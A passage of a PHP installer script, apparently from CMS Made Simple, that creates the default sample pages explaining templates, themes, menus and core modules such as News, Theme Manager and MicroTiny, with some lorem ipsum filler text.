Panel.</p></div><div class="templatecode"><h3>Page content</h3><pre>&lt;h2&gt;{ldelim}title}&lt;/h2&gt;{ldelim}content}</pre><p>Maybe the most important tag in your template. Where you put the <code>{ldelim}content}</code> is where the content for your page will appear.</p><p>We have also chosen to put the page title on every page (the <code>{ldelim}title}</code> tag), so that you don\'t have to put that in the content for every page.</p><p>The default <code>{ldelim}content}</code> tag is <strong>required</strong> for all templates.</p><p><em>Read more</em> about the <code>{ldelim}content}</code> and <code>{ldelim}title}</code> tags in Extensions &raquo; Tags in the Admin Panel.</p></div><div class="templatecode"><h3>Previous/next links</h3><pre>{ldelim}anchor anchor=\'main\' text=\'^ Top\'}{ldelim}cms_selflink dir="previous"}{ldelim}cms_selflink dir="next"}</pre><p>Some more internal links. These are using the dir parameter to link to the previous and next pages in the page hierarchy (separators and section headers will be omitted as they are no pages).</p></div><div class="templatecode"><h3>Page footer</h3><pre>{ldelim}global_content name=\'footer\'}</pre><p>Instead of bloating your template with lots of code you can put some code in a Global Content Block. Then call that Global Content Block with the <code>{ldelim}global_content}</code> tag. It\'s also useful for content or HTML code that is reused on several pages or templates.</p><p>In the default templates we have put the footer text in a Global Content Block with the name \'footer\'. You find the Global Content Blocks in the Content menu in the Admin Panel.</p><p><em>Read more</em> about the <code>{ldelim}global_content}</code> tag in Extensions &raquo; Tags in the Admin Panel.</p></div>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Left simple navigation + 1 column / Default Templates Explained / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Left simple navigation + 1 column');
$contentobj->SetAlias();
$contentobj->SetMenuText('Left simple navigation + 1 column');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetAlias('navleft');
$contentobj->SetParentId($content_list['Default Templates Explained']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>This template has the menu in left sidebar. The menu is using the <strong>Simple Navigation</strong> menu template. It is styled in the stylesheet called <strong>Navigation Simple - Vertical</strong>.</p><p>You can easily float the sidebar with the menu to the right instead. Look in the <strong>Layout Left sidebar + 1 column</strong> style sheet for the <code>float:left;</code> property in the <code>div#sidebar</code> element. Change that to <code>float:right;</code> and the sidebar with the menu will instead be on the right side of the content, of course you will also have to adjust the margins for the sidebar and the div#main, basically just swap the left and right margins.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Top simple navigation + left subnavigation + 1 column / Default Templates Explained / Top simple navigation + left subnavigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Top simple navigation + left subnavigation + 1 column');
$contentobj->SetAlias();
$contentobj->SetMenuText('Top simple navigation + left subnavigation + 1 column');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$topsimple_leftsubnav_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Top simple navigation + left subnavigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetAlias('top_left');
$contentobj->SetParentId($content_list['Default Templates Explained']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>With the Menu Manager you can easily split the navigation in two parts. On this page the top level in the page hierarchy is displayed horizontally and depending on what page is displayed a localized sub-menu is displayed vertically to the left. In this case the sub-menu to the left displays the sub-levels (children) to <strong>Default Templates Explained</strong>.</p><h3>The {ldelim}menu} tag</h3><p>The <code>{ldelim}menu}</code> tag is inserted twice in the page template. First where the main navigation is, which should only show the top level. It looks like this: <code>{ldelim}menu template=\'Simple Navigation\' number_of_levels=\'1\'}</code>.</p><p>The sub navigation should only contain the second level and down, depending on what is selected on the first level. Also, the third level links should only display when its parent on the second level is clicked, otherwise they are hidden. That is, the second level is collapsed unless the current page has sub pages.</p><p>The tag for the sub navigation looks like this: <code>{ldelim}menu template=\'simple_navigation.tpl\' start_level=\'2\' collapse=\'1\'}</code>.</p><h3>Attached style sheets for the menu</h3><p>As the main navigation and the sub navigation need to be styled differently (one horizontal, the other vertical), two navigation style sheets are attached to this page template. <strong>Navigation Simple - Horizontal</strong> is for styling the horizontal main menu. <strong>Navigation Simple - Vertical</strong> on the other hand, contains the style for the sub navigation to the left.</p><h3>Both using the same Menu Manager template</h3><p>However, as you could see, both parts of the navigation are using the same menu manager template. That is because the output code is the same. It is only through CSS that the two parts get styled differently.</p><h3>Floating the sidebar to the right</h3><p>You can easily float the sidebar with the sub navigation to the right instead. Look in the <strong>Layout Top menu + 2 columns</strong> style sheet for the <code>float:left;</code> property in the <code>div#sidebar</code> element. Change that to <code>float:right;</code> and the sidebar with the menu will instead be on the right side of the content, of course you will also have to adjust the margins for the sidebar and the div#main, basically just swap the left and right margins.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// CSSMenu top + 2 columns / Default Templates Explained / CSSMenu top + 2 columns
$contentobj = new Content;
$contentobj->SetName('CSSMenu top + 2 columns');
$contentobj->SetAlias();
$contentobj->SetMenuText('CSSMenu top + 2 columns');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$css_menutop_2col_theme->get_id());
$contentobj->SetTemplateId($template_list['CSSMenu top + 2 columns']);
$contentobj->SetOwner(1);
$contentobj->SetAlias('cssmenu_horizontal');
$contentobj->SetParentId($content_list['Default Templates Explained']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>This is a drop-down menu that is using only CSS (although some Javascript is required for Internet Explorer 6, note: IE6 will not let you use 2 of these menu types in a template at the same time as the second one will fail to open). It can be either vertical or horizontal.</p><p>The code we have inserted in the template that this page is using is simply <code>{ldelim}menu template=\'cssmenu.tpl\'}</code>.  You style the menu in the stylesheet <strong>Navigation CSSMenu - Horizontal</strong> or <strong>Navigation CSSMenu - Vertical</strong> for the vertical CSSMenu.</p><p>But to be on the safe side, copy this style sheet and attach your new style sheet to the template instead (and make your changes in your new style sheet). Then you can always revert to the default style sheet if something goes wrong.</p>');
$contentobj->SetPropertyValue('Sidebar',
	'<p>Just some test content goes here as an example of a very long sentence that probably should have been divided into several smaller sentences, were it not for this just being a test sentence on one of the default pages of CMS Made Simple, an excellent Content Management System for easily creating web sites, this sentence is added when adding/editing a page in the Sidebar: text area, this comes from the template place holder {ldelim}content block=\'Sidebar\'}.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// CSSMenu left + 1 column / Default Templates Explained / CSSMenu left + 1 column
$contentobj = new Content;
$contentobj->SetName('CSSMenu left + 1 column');
$contentobj->SetAlias();
$contentobj->SetMenuText('CSSMenu left + 1 column');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$css_menuleft_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['CSSMenu left + 1 column']);
$contentobj->SetAlias('cssmenu_vertical');
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Default Templates Explained']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>This is basically the same as the last one, CSSMenu top + 2 column, with the menu on the left instead of across the top there isn\'t a whole lot to say about it.</p><h3>Filler Text</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Ut ac leo in lorem ultricies sollicitudin. Vivamus molestie elit nec nulla. Suspendisse potenti. Suspendisse at lorem. Donec pulvinar, magna eget molestie pretium, justo sem iaculis urna, eget condimentum nibh augue pellentesque arcu. Integer tristique tempor mauris. Sed justo orci, commodo volutpat, sagittis vitae, varius vitae, massa. Maecenas pede ligula, iaculis sit amet, pharetra eu, adipiscing consectetuer, eros. Duis ullamcorper nisl ac magna. Nunc neque dolor, posuere dapibus, convallis non, tristique sed, nibh. Suspendisse quis leo. Phasellus pretium erat ut purus. Duis facilisis consectetuer sapien. Nulla eget pede ut nisl faucibus consequat. Quisque erat lectus, luctus in, pellentesque ac, adipiscing eu, enim. Donec ultrices laoreet urna.</p><h3>Subheading</h3><p>Vestibulum vitae tellus. Fusce quis ligula. Cras mi. Mauris congue, lacus eget rhoncus venenatis, mi nunc volutpat nisl, ut ornare erat augue quis mauris. Nulla in sem. Donec semper odio ac ante. Cras a libero in risus mattis commodo. Phasellus pellentesque lectus. Donec a mi. Integer euismod neque at arcu. Morbi ligula nulla, dapibus nec, fermentum ut, tristique vel, pede. Morbi at diam. Vestibulum quam. Cras consectetuer wisi id neque. Etiam dictum vulputate ligula. Aliquam erat volutpat. Proin vitae lorem in justo imperdiet nonummy. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Suspendisse leo. Sed in eros ut lectus lacinia condimentum.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Minimal template / Default Templates Explained / Minimal template
$contentobj = new Content;
$contentobj->SetName('Minimal template');
$contentobj->SetAlias();
$contentobj->SetMenuText('Minimal template');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$minimal_theme->get_id());
$contentobj->SetTemplateId($template_list['Minimal']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Default Templates Explained']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>This is an example of the very minimal that needs to be in a CMSMS template. No stylesheet is attached to the template, which is why it doesn\'t look very nice...</p><p>However, to make it slightly more appealing, some inline styling was used, for floating the content to the right of the menu.</p><p>The menu in this page template is using the <strong>Minimal Navigation</strong> template for Menu Manager. No accessibility stuff is in there, so it\'s recommended that the <strong>Simple Navigation</strong> menu template is rather used.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Higher End / Default Templates Explained / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Higher End');
$contentobj->SetAlias();
$contentobj->SetMenuText('Higher End');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Default Templates Explained']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>These are more complex then some of the other templates, especially the menus, they all 3 use the same menu template. Which shows you the power of CSS.</p><p>Be forewarned, if you use IE6 you won\'t see the best effects in any of the shadow menus that you see using a more standards compliant browser. I mean it\'s still nice grant you but... just upgrade your browser if you can.</p><h3>The Differences</h3><p>Starting with NCleanBlue you get a really nice, subtle Tabbed menu, then it goes on to have a real nice drop down effect.</p><p>You get a real nice 2.0 header and footer, great color scheme and the search is way cool, it\'s just a great theme, what can I say, thanks Nuno.</p><p>Then the next 2 submenus have another version of the shadowed drop, the first step will point up for the top sub menu and to the right for the left sub menus.</p><p>These 2 are the same layout as CSSMenu top + 2 columns and CSSMenu left + 1 column,  respectively, except for the menu template and some CSS.</p><p>We hope you enjoy these, for any changes you want to make it\'s always best to copy the original style sheet for safe keeping, you never know when you may need it.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// NCleanBlue / Higher End / NCleanBlue
$contentobj = new Content;
$contentobj->SetName('NCleanBlue');
$contentobj->SetAlias();
$contentobj->SetMenuText('NCleanBlue');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$ncleanblue_theme->get_id());
$contentobj->SetTemplateId($template_list['NCleanBlue']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Higher End']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
      '<p>Nuno has graciously supplied us with another of his great looking designs.</p><p>This one is using a new menu template so we can style the drop down for the children pages, using an image for the second ul going from the top down, it has an extra li at the bottom of the child pages ul &lt;li class="separator once" style="list-style-type: none;"&gt;&amp;nbsp; &lt;/li&gt; this is used to hold the bottom image.</p><h3>Filler Text</h3><p>Maecenas tristique, tortor nec eleifend luctus, nibh leo imperdiet wisi, et accumsan est lectus in orci. Proin facilisis, odio auctor feugiat accumsan, sapien purus iaculis dui, a volutpat augue pede ut sem. Nulla facilisi. Aliquam suscipit elementum ipsum. Morbi urna. Nam eros justo, varius sit amet, euismod eu, dictum nec, neque. Nullam id mi eu odio tempor adipiscing. Quisque hendrerit euismod nunc. Ut erat nulla, pellentesque nec, luctus eu, dictum nec, augue. Aliquam tincidunt sodales arcu. Nam porta sagittis quam. Vivamus eget purus egestas velit congue consectetuer.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// ShadowMenu Tab + 2 columns / Higher End / ShadowMenu Tab + 2 columns
$contentobj = new Content;
$contentobj->SetName('ShadowMenu Tab + 2 columns');
$contentobj->SetAlias();
$contentobj->SetMenuText('ShadowMenu Tab + 2 columns');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$shadowmenu_tab_2col_theme->get_id());
$contentobj->SetTemplateId($template_list['ShadowMenu Tab + 2 columns']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Higher End']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>Using the same menu template as the previous theme. We changed the child ul CSS to use a different top image. This involves changing some of the margin and padding as the images are a different shape. Note the difference in the second level and third level ul images, one has an arrow up and the other has an arrow left.</p><h3>Filler Text</h3><p>Curabitur ornare velit molestie nulla. Fusce fermentum facilisis mi. Maecenas volutpat, eros ac pellentesque mollis, urna elit rutrum turpis, congue convallis nibh erat nec purus. Sed malesuada consectetuer turpis. Nulla sollicitudin placerat augue. Vestibulum ut sem eget turpis laoreet cursus. Vestibulum ante urna, mollis eget, cursus eget, viverra non, lectus. Aliquam erat volutpat. Aenean gravida tempor nulla. Sed sem lorem, pulvinar non, placerat non, vestibulum sed, tellus. Phasellus fermentum velit id dui. Praesent vulputate. Nam in dui.</p><p>Maecenas tristique, tortor nec eleifend luctus, nibh leo imperdiet wisi, et accumsan est lectus in orci. Proin facilisis, odio auctor feugiat accumsan, sapien purus iaculis dui, a volutpat augue pede ut sem. Nulla facilisi. Aliquam suscipit elementum ipsum. Morbi urna. Nam eros justo, varius sit amet, euismod eu, dictum nec, neque. Nullam id mi eu odio tempor adipiscing. Quisque hendrerit euismod nunc. Ut erat nulla, pellentesque nec, luctus eu, dictum nec, augue. Aliquam tincidunt sodales arcu. Nam porta sagittis quam. Vivamus eget purus egestas velit congue consectetuer.</p>');
$contentobj->SetPropertyValue('Sidebar',
	'<h4>Filler Text</h4><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Cras sodales gravida est. Nullam enim ipsum, convallis quis, iaculis quis, facilisis eu, felis. Proin euismod hendrerit tortor. Aliquam erat volutpat. Morbi tempus diam sit amet neque. Sed sem metus, sagittis vel, lobortis ac, tempus sit amet, wisi. Phasellus in diam. Maecenas ultrices rutrum mauris. Vestibulum dolor justo, blandit a, posuere quis, varius at, tellus. Vestibulum convallis. Nulla ut leo sed elit eleifend varius. Aenean eget est id lorem posuere laoreet.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// ShadowMenu left + 1 column / Higher End / ShadowMenu left + 1 column
$contentobj = new Content;
$contentobj->SetName('ShadowMenu Left + 1 column');
$contentobj->SetAlias();
$contentobj->SetMenuText('ShadowMenu Left + 1 column');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$shadowmenu_left_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['ShadowMenu left + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Higher End']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
      '<p>Again using the same menu template as the two previous themes. We changed the child ul CSS to use a different top image. This involves changing some of the margin and padding as the images are a different shape. Note the second level and third level ul are now using the same image that has an arrow left.</p><h3>Filler Text</h3><p>Curabitur ornare velit molestie nulla. Fusce fermentum facilisis mi. Maecenas volutpat, eros ac pellentesque mollis, urna elit rutrum turpis, congue convallis nibh erat nec purus. Sed malesuada consectetuer turpis. Nulla sollicitudin placerat augue. Vestibulum ut sem eget turpis laoreet cursus. Vestibulum ante urna, mollis eget, cursus eget, viverra non, lectus. Aliquam erat volutpat. Aenean gravida tempor nulla. Sed sem lorem, pulvinar non, placerat non, vestibulum sed, tellus. Phasellus fermentum velit id dui. Praesent vulputate. Nam in dui.</p><p>Maecenas tristique, tortor nec eleifend luctus, nibh leo imperdiet wisi, et accumsan est lectus in orci. Proin facilisis, odio auctor feugiat accumsan, sapien purus iaculis dui, a volutpat augue pede ut sem. Nulla facilisi. Aliquam suscipit elementum ipsum. Morbi urna. Nam eros justo, varius sit amet, euismod eu, dictum nec, neque. Nullam id mi eu odio tempor adipiscing. Quisque hendrerit euismod nunc. Ut erat nulla, pellentesque nec, luctus eu, dictum nec, augue. Aliquam tincidunt sodales arcu. Nam porta sagittis quam. Vivamus eget purus egestas velit congue consectetuer.</p>');


// Welcome to Simplex / Default Templates Explained / Higher End / Simplex
$contentobj = new Content;
$contentobj->SetName('Welcome to Simplex');
$contentobj->SetAlias();
$contentobj->SetMenuText('Simplex Theme');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$simplex_theme->get_id());
$contentobj->SetTemplateId($template_list['Simplex']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Higher End']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
     '<p>Simplex Theme has been created to demonstrate HTML5 and CSS3 functionality within CMS Made Simple&trade;.<br />It is shipped with a CSS Framework making it possible for you to create Responsive and Mobile capabale layouts with ease.</p><h2>What is included?</h2><p>With this Template you will find four Stylesheets attached to it.</p><ul><li>Simplex Core</li><li>Simplex Layout</li><li>Simplex Mobile</li><li>Simplex Print</li></ul><p>Main Functionality of this Template is included in Core Stylesheet. It contains a simple Fluid Grid Framework based on <a class="external" href="http://960.gs/" title="960 Grid System" target="_blank">960 Grid System</a>.<br />In this same Stylesheet CSS <a class="external" href="http://www.w3.org/TR/css3-mediaqueries/" title="W3C Media Queries" target="_blank">Media Queries</a> are being used that make it possible for a flexible layout based on Screen width.<br /><br />With Simplex Theme it is very easy to quickly change appearance of complete Site at once. If you look at Page Template code you will find "boxed" id in the <code>&lt;body&gt;</code> tag.<br />When this id is removed the Layout of the Site is changed and you would face a simple layout with White background.<br />You can also quickly change allignement of the complete Site. If you change the class of "wrapper" div to leftaligned or rightaligned, whole Page will be aligned to left or right.</p><h2>Support for Mobile Devices</h2><p>As mentioned above this Theme is shipped with Stylesheet Framework that gives you a starting point for easy developement of Responsive Layout.<br />Mobile world is very versatile and Framework itself is by no means perfect, it is only a starting point but as a Developer you should decide which technique you should use for your current Project.<br />Responsive Template is only one small step towards Mobile support.</p><p>This Theme requires <a class="external" href="http://jquery.org/" title="jQuery" target="_blank">jQuery</a> which is included with <code>{ldelim}cms_jquery{rdelim}</code> tag.</p><p><cite>Note: {ldelim}cms_jquery{rdelim} tag is included at the bottom of the Template. You should be carefull with it when you are using Modules that include jQuery in &lt;head&gt; section.</cite></p><p>In file functions.js a section is included that makes it possible of Navigating through site with some Mobile Devices. This part of the code, covers only few devices and it is only meant as an example and a starting point for Developer.</p><h2>This and that</h2><p>As an example of <a class="external" href="http://www.smarty.net/" title="Smarty" target="_blank">Smarty</a> power within CMS Made Simple&trade; Templates a very simple Slider has been included, which demonstartes how easy it is to quickly create a Slideshow without a single Module.</p><pre><code>{ldelim}assign var=\'teaser\' value=\'uploads/simplex/teaser/*.jpg\'|glob{rdelim}<br />{ldelim}foreach from=$teaser item=\'one\'{rdelim}<br /> &lt;div&gt;&lt;img src=\'{ldelim}root_url{rdelim}/{ldelim}$one{rdelim}\' width=\'852\' height=\'275\' alt=\'\' /&gt;&lt;/div&gt;<br />{ldelim}/foreach{rdelim}<br /> {/strip}</code></pre><p><cite>If you would like to make this Slider responsive you should include a additional jQuery Plugin like for example <a class="external" href="http://swipejs.com" target="_blank" title="SwipeJS">SwipeJS</a></cite></p><p>In included Stylesheets, Smarty has been used as well. This should make it possible for you, to quickly change Color scheme of the theme by simply changing HEX code within assign Tags.</p><pre><code>[[assign var=\'boxed_bg\' value="#d1d1d1 url(`$path`/boxed-bg.gif)"]][[assign var=\'light_grey\' value=\'#f1f1f1\']]<br />[[assign var=\'grey\' value=\'#e9e9e9\']]<br />[[assign var=\'dark_grey\' value=\'#555\']]<br />[[assign var=\'white\' value=\'#fff\']]<br />[[assign var=\'orange\' value=\'#f39c2c\']]<br />[[assign var=\'dark_orange\' value=\'#e6870e\']]<br />[[assign var=\'yellow\' value=\'#fdbd34\']]</code></pre><p>If you are using a modern Browser, you will notice that the Theme is using some of <a class="external" href="http://www.w3.org/TR/CSS/#css3" title="CSS3" target="_blank">CSS3</a> techniques. There are no Internet Explorer fallbacks included but this doesn\'t mean that it does not work in Internet Explorer.<br />A Visitor that is using Internet Explorer will simply see a Layout with gracefull fallback, meaning animations will not animate, rounded corners will be edges...</p><p><em>Note from Theme Develper Goran Ilic (uniqu3e):</em></p><blockquote><cite>The Simplex Theme was kept simplistic which should make it possible for a Developer to easily read code used in Theme and either create a new Layout from it or editing this Theme.<br /><br />A full Internet Explorer or Mobile support was intentionally not included, as each Developer should decide how far a old Browser like Internet Explorer (7,8) or which Mobile devices he wants to support and which Technique he will use.<br />Each Project is different and with each Project there is a need for different techniques.</cite></blockquote>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

//////////////////////////////////
//  //  DEFAULT EXTENSIONS  //  //
//////////////////////////////////

// Default Extensions / -1 / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Default Extensions');
$contentobj->SetAlias();
$contentobj->SetMenuText('Default Extensions');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId(-1);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>With the default installation of CMS Made Simple come six modules and a number of tags. The features of these are described and displayed on the following pages.</p><p>To find out more about the core modules, click {cms_selflink page=\'modules\' text=\'Modules\'}. For an explanation the core tags, simply click {cms_selflink page=\'tags\' text=\'Tags\'}.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Modules / 24 / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Modules');
$contentobj->SetAlias();
$contentobj->SetMenuText('Modules');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Default Extensions']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>There are six modules that come with the default installation of CMS Made Simple. On the following pages we explain how these are used. Click on each module name in the menu to the left or in the list below.</p><p>To insert a module in a template or a page you normally use the <code>{ldelim}cms_module}</code> tag with the module name as one of the parameters. But to simplify things, all core modules also have a tag wrapper, so that they are called simple by their name, like <code>{ldelim}news}</code>.</p><ul><li>{cms_selflink page=\'news\' text=\'News\'}</li><li>{cms_selflink page=\'menu-manager-2\' text=\'Menu Manager\'}</li><li>{cms_selflink page=\'theme-manager\' text=\'Theme Manager\'}</li><li>{cms_selflink page=\'microtiny\' text=\'MicroTiny\'}</li><li>{cms_selflink page=\'search\' text=\'Search\'}</li><li>{cms_selflink page=\'module-manager\' text=\'Module Manager\'}</li></ul>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// News / Modules / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('News');
$contentobj->SetAlias();
$contentobj->SetMenuText('News');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Modules']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>Most web sites have a section for the latest news. In CMS Made Simple the best way to accomplish that is by using the News module.</p><p>To display a list of news items you insert the tag <code>{ldelim}news number=\'5\' category=\'General\'}</code>. On this page the tag is inserted in the template. But it can also be inserted on a page. You can see the News module in use in the sidebar to the left.</p><p>There are a number of parameters that can be used in conjunction with this tag. To read about how a module is used, navigate to Extensions &raquo; Modules in the Admin Panel and click on "Help" for the module you want to read about.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Menu Manager / Modules / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Menu Manager');
$contentobj->SetAlias();
$contentobj->SetMenuText('Menu Manager');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Modules']);
$contentobj->SetAlias('menu-manager-2');
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>The Menu Manager has already been explained on the How CMSMS Works » {cms_selflink page=\'menu-manager\' text=\'Menu Manager\'} page. It is a very powerful module that can be used for any kind of navigation system on your web site.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Theme Manager / Modules / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Theme Manager');
$contentobj->SetAlias();
$contentobj->SetMenuText('Theme Manager');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Modules']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>The Theme Manager module allows you to import and export templates and their attached stylesheets, including any images they use, as "themes". This allows you to share your look and feel with other CMSMS users.</p><p>It is very easy to convert any kind of template to be used with CMS Made Simple. Many templates like this have already been converted and can be installed using the Theme Manager, the CMSMS community also shares themes for anyone to download and use at the <a class="external" target="_blank" href="http://themes.cmsmadesimple.org">CMSMS Themes site</a>.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// MicroTiny / Modules / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('MicroTiny');
$contentobj->SetAlias();
$contentobj->SetMenuText('MicroTiny');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Modules']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>MicroTiny is a so called WYSIWYG editor for editing pages. WYSIWYG stands for What You See Is What You Get. It works similar to a word processor, where you can select the style for the content and see how it is going to look on the page.</p><p>Among available WYSIWYG editors CMS Made Simple has decided to use MicroTiny (the stripped down version of TinyMCE). TinyMCE is among the most developed WYSIWYG editors, with regular updates, a large following and customizable features.</p><p>However, it is very difficult to create a cross-browser online editor that works in all different kinds of environments. If you are familiar with HTML you can select no WYSIWYG in My Preferences &raquo; User Preferences in the Admin Panel. That gives you more control over the code that will be on the page.</p><p>There are also other WYSIWYG editor modules available for download.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();


// Search / Modules / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Search');
$contentobj->SetAlias();
$contentobj->SetMenuText('Search');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['Modules']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
